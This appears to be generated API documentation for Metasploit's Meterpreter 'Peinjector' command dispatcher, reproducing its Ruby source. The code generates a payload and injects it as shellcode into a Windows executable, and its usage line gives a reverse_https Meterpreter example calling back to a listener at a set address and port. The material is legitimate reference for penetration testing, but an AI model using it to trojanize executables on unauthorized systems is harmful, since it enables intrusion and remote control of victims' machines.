Class: Rex::Post::Meterpreter::Ui::Console::CommandDispatcher::Peinjector

Inherits:

Object

• Object
• Rex::Post::Meterpreter::Ui::Console::CommandDispatcher::Peinjector

Includes:

Rex::Post::Meterpreter::Ui::Console::CommandDispatcher

Defined in:

lib/rex/post/meterpreter/ui/console/command_dispatcher/peinjector.rb

Overview

Peinjector extension - inject a given shellcode into an executable file

Constant Summary

Klass =

Console::CommandDispatcher::Peinjector

@@injectpe_opts =

Rex::Parser::Arguments.new(
  '-p' => [true, 'Windows Payload to inject into the target executable.'],
  '-t' => [true, 'Path of the target executable to be injected'],
  '-o' => [true, 'Comma separated list of additional options for payload if needed in \'opt1=val,opt2=val\' format.'],
  '-h' => [false, 'Help banner']
)

Instance Attribute Summary

Attributes included from Ui::Text::DispatcherShell::CommandDispatcher

#shell, #tab_complete_items

Instance Method Summary

• #cmd_injectpe(*args) ⇒ Object

  Inject a given shellcode into a remote executable.

• #commands ⇒ Object

  List of supported commands.

• #create_payload(name, opts = "") ⇒ Object

  Create a payload given a name, lhost and lport, additional options.

• #inject_payload(pay, targetpe) ⇒ Object
• #injectpe_usage ⇒ Object
• #name ⇒ Object

  Name for this dispatcher.

Methods included from Rex::Post::Meterpreter::Ui::Console::CommandDispatcher

check_hash, #client, #docs_dir, #filter_commands, #initialize, #log_error, #msf_loaded?, #session, set_hash, #unknown_command

Methods included from Msf::Ui::Console::CommandDispatcher::Session

#cmd_background, #cmd_background_help, #cmd_exit, #cmd_irb, #cmd_irb_help, #cmd_irb_tabs, #cmd_pry, #cmd_pry_help, #cmd_resource, #cmd_resource_help, #cmd_resource_tabs, #cmd_sessions, #cmd_sessions_help

Methods included from Ui::Text::DispatcherShell::CommandDispatcher

#cmd_help, #cmd_help_help, #cmd_help_tabs, #deprecated_cmd, #deprecated_commands, #deprecated_help, #docs_dir, #help_to_s, included, #initialize, #print, #print_error, #print_good, #print_line, #print_status, #print_warning, #tab_complete_directory, #tab_complete_filenames, #tab_complete_generic, #tab_complete_source_address, #unknown_command, #update_prompt

Instance Method Details

#cmd_injectpe(*args) ⇒ Object

Inject a given shellcode into a remote executable

# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/peinjector.rb', line 54

def cmd_injectpe(*args)
  if args.length == 0 || args.include?('-h')
   injectpe_usage
    return false
  end

  opts = {
    payload: nil,
    targetpe: nil,
    options: nil
  	}

  @@injectpe_opts.parse(args) { |opt, idx, val|
    case opt
    when '-p'
      opts[:payload] = val
    when '-t'
      opts[:targetpe] = val
    when '-o'
      opts[:options] = val
    end
  }
  payload = create_payload(opts[:payload], opts[:options])

  inject_payload(payload, opts[:targetpe])
end

#commands ⇒ Object

List of supported commands.

# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/peinjector.rb', line 30

def commands
  {
    'injectpe'  => 'Inject a shellcode into a given executable'
  }
end

#create_payload(name, opts = "") ⇒ Object

Create a payload given a name, lhost and lport, additional options

# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/peinjector.rb', line 82

def create_payload(name, opts = "")

  pay = client.framework.payloads.create(name)
  pay.datastore['EXITFUNC'] = 'thread'
  pay.available_space = 1.gigabyte # this is to generate a proper uuid and make the payload to work with the universal handler

  if not opts.blank?
    opts.split(",").each do |o|
    opt,val = o.split("=",2)
    pay.datastore[opt] = val
    end
  end

  # Validate the options for the module
  pay.options.validate(pay.datastore)
  return pay
end

#inject_payload(pay, targetpe) ⇒ Object

# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/peinjector.rb', line 100

def inject_payload(pay, targetpe)

  begin
    print_status("Generating payload")
    raw = pay.generate
    param = {}

    if pay.arch.join == ARCH_X64
      threaded_shellcode = client.peinjector.add_thread_x64(raw)
      param[:isx64] = true
    else
      threaded_shellcode = client.peinjector.add_thread_x86(raw)
      param[:isx64] = false
    end

    param[:shellcode] = threaded_shellcode
    param[:targetpe] = targetpe
    param[:size] = threaded_shellcode.length;

    print_status("Injecting #{pay.name} into the executable #{targetpe}")
    client.peinjector.inject_shellcode(param)
    print_good("Successfully injected payload into the executable: #{targetpe}")

  rescue ::Exception => e
    print_error("Failed to Inject Payload to executable #{targetpe}!")
    print_error(e.to_s)
  end
end

#injectpe_usage ⇒ Object

# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/peinjector.rb', line 44

def injectpe_usage
  print_line('Usage: injectpe -p < windows/meterpreter/reverse_https > -t < c:\target_file.exe >, -o < lhost=192.168.1.123, lport=4443 >')
  print_line
  print_line('Inject a shellcode on the target executable.')
  print_line(@@injectpe_opts.usage)
end

#name ⇒ Object

Name for this dispatcher

# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/peinjector.rb', line 23

def name
  'Peinjector'
end